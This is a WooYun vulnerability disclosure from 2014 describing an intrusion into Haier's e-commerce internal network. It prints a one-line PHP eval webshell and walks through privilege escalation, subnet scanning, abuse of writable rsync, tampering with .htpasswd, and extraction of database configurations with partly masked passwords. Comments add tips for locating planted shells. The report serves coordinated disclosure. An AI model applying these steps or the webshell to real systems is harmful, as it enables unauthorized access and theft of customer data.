当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085777

漏洞标题:海尔某遗留问题导致可访问商城主库

相关厂商:海尔集团

漏洞作者: s0mun5

提交时间:2014-12-03 21:02

修复时间:2015-01-17 21:04

公开时间:2015-01-17 21:04

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-03: 细节已通知厂商并且等待厂商处理中
2014-12-04: 厂商已经确认,细节仅向厂商公开
2014-12-14: 细节向核心白帽子及相关领域专家公开
2014-12-24: 细节向普通白帽子公开
2015-01-03: 细节向实习白帽子公开
2015-01-17: 细节向公众公开

简要描述:

海尔某遗留问题进入内网 加之 内网防护过于薄弱 可导致商城用户、订单库泄露

详细说明:

http://zixun.ehaier.com/ 为wordpress搭建
对之前常见批量getshell特征匹配 成功找到一个后门
http://zixun.ehaier.com/wp-content/themes/radius/404.php

Snip20141203_16.png

后门创建时间为13-7-21

<?php @eval($_POST['pass']);?>

典型的php一句话
如果进行过查杀很容易发现

uname -a
Linux zixun-01.hst.ehaieridc.net 2.6.18-128.el5xen #1 SMP Wed Dec 17 12:01:40 EST 2008 x86_64 x86_64 x86_64 GNU/Linux


内核版本比较老 可以直接进行提权

Snip20141203_19.png

Snip20141203_20.png


漏洞证明:

对网络基本结构进行分析

Snip20141203_17.png


发现基本通信都是在10.9.10.1/24网段进行
本机已经安装了nmap,使用nmap对c段进行基本扫描
经过筛选发现 10.9.10.135 开启了rsync未授权访问

Snip20141203_21.png


web访问 10.9.10.135 开启了 401认证
由于rsync可写 下载.htpasswd 然后添加一个用户test:123456
登陆成功。
然后同步一个shell上去,成功getshell。

Snip20141203_22.png

Snip20141203_24.png


内核版本与上一台一样,同样可以提权,不再证明。
登陆时发现这web的功能是统计网站数据,包含用户、订单、访问等等
猜测有连接数据库的关键文件
查找配置文件,找到main_pro.php果然发现很多数据库配置

'db'=>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=10.9.10.61;dbname=db_mnt',
'emulatePrepare' => true,
'username' => 'imgfilter',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_mobile_mnt'=>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=db_mobile_mnt',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_analysis' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=ehaier_analysis_db',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => 'tbl_',
),
'data_analysis' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=data_analysis',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_shop' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',
'emulatePrepare' => true,
'username' => 'pec',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_shopattributes' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=ShopAttributes',
'emulatePrepare' => true,
'username' => 'pec',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_stock' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-cbs-rnd.vip.ehaieridc.net;dbname=db_stock',
'emulatePrepare' => true,
'username' => 'cbs_stock_ro',
'password' => '**********D)(]*********[zdF',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_eis' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-cbs-wrt.vip.ehaieridc.net;dbname=db_eis',
'emulatePrepare' => true,
'username' => 'cbs_eis_ser',
'password' => 'cBs*{*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_mobile' =>array(
'class' => 'CDbConnection',
'connectionString' => 'mysql:host=my-shop-rnd.vip.ehaieridc.net;dbname=m_shop',
'emulatePrepare' => true,
'username' => 'm_shop_ro',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),


连接'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',
的数据库

Snip20141203_26.png


Snip20141203_27.png

用户473w
为了验证是线上数据库 我注册了一个账号 在数据库中马上查到了

Snip20141203_28.png

Snip20141203_29.png


订单

Snip20141203_32.png

Snip20141203_31.png


黑客入侵内网 无非就是想要这些 已经没有必要继续深入

修复方案:

边界安全做好 经常对服务器进行体检
内网安全一样要做好

版权声明:转载请注明来源 s0mun5@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-12-04 16:11

厂商回复:

感谢s0mun5与乌云平台的测试与提醒,我方已安排人员进行处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-04 09:01 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    没人捧场吗?

  2. 2014-12-04 09:11 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    闪电在哪里?

  3. 2014-12-04 16:34 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    楼上你们2位,谁允许你们这么高rank 的!!!哼

  4. 2014-12-04 22:50 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    楼上的三位 ,谁允许你们这么高rank 的!!!哼

  5. 2014-12-04 23:55 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    楼上都是大牛

  6. 2014-12-05 11:02 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    楼上都是大牛

  7. 2015-01-17 21:28 | 李宇航的小柠檬 ( 路人 | Rank:5 漏洞数:1 | 小柠檬甜不甜)

    我是大牛233333

  8. 2015-01-17 22:43 | 曙光的希望 ( 路人 | Rank:4 漏洞数:1 | 曙光的希望)

    能不能给我个wordpress漏洞工具 谢了。。。

  9. 2015-03-02 08:49 | 阿里阿里 ( 路人 | Rank:0 漏洞数:1 | 来打酱油的)

    对之前常见批量getshell特征匹配,这个是怎么操作的啊?

  10. 2015-03-11 16:58 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    怎样用菜刀连上内网135机器的?

  11. 2015-03-12 09:13 | s0mun5 认证白帽子 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

    @luwikes 代理出来了

  12. 2015-03-12 09:14 | s0mun5 认证白帽子 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

    @阿里阿里 wp写shell 很多人写到主题的404里。用常用webshell密码post几个包就可以了。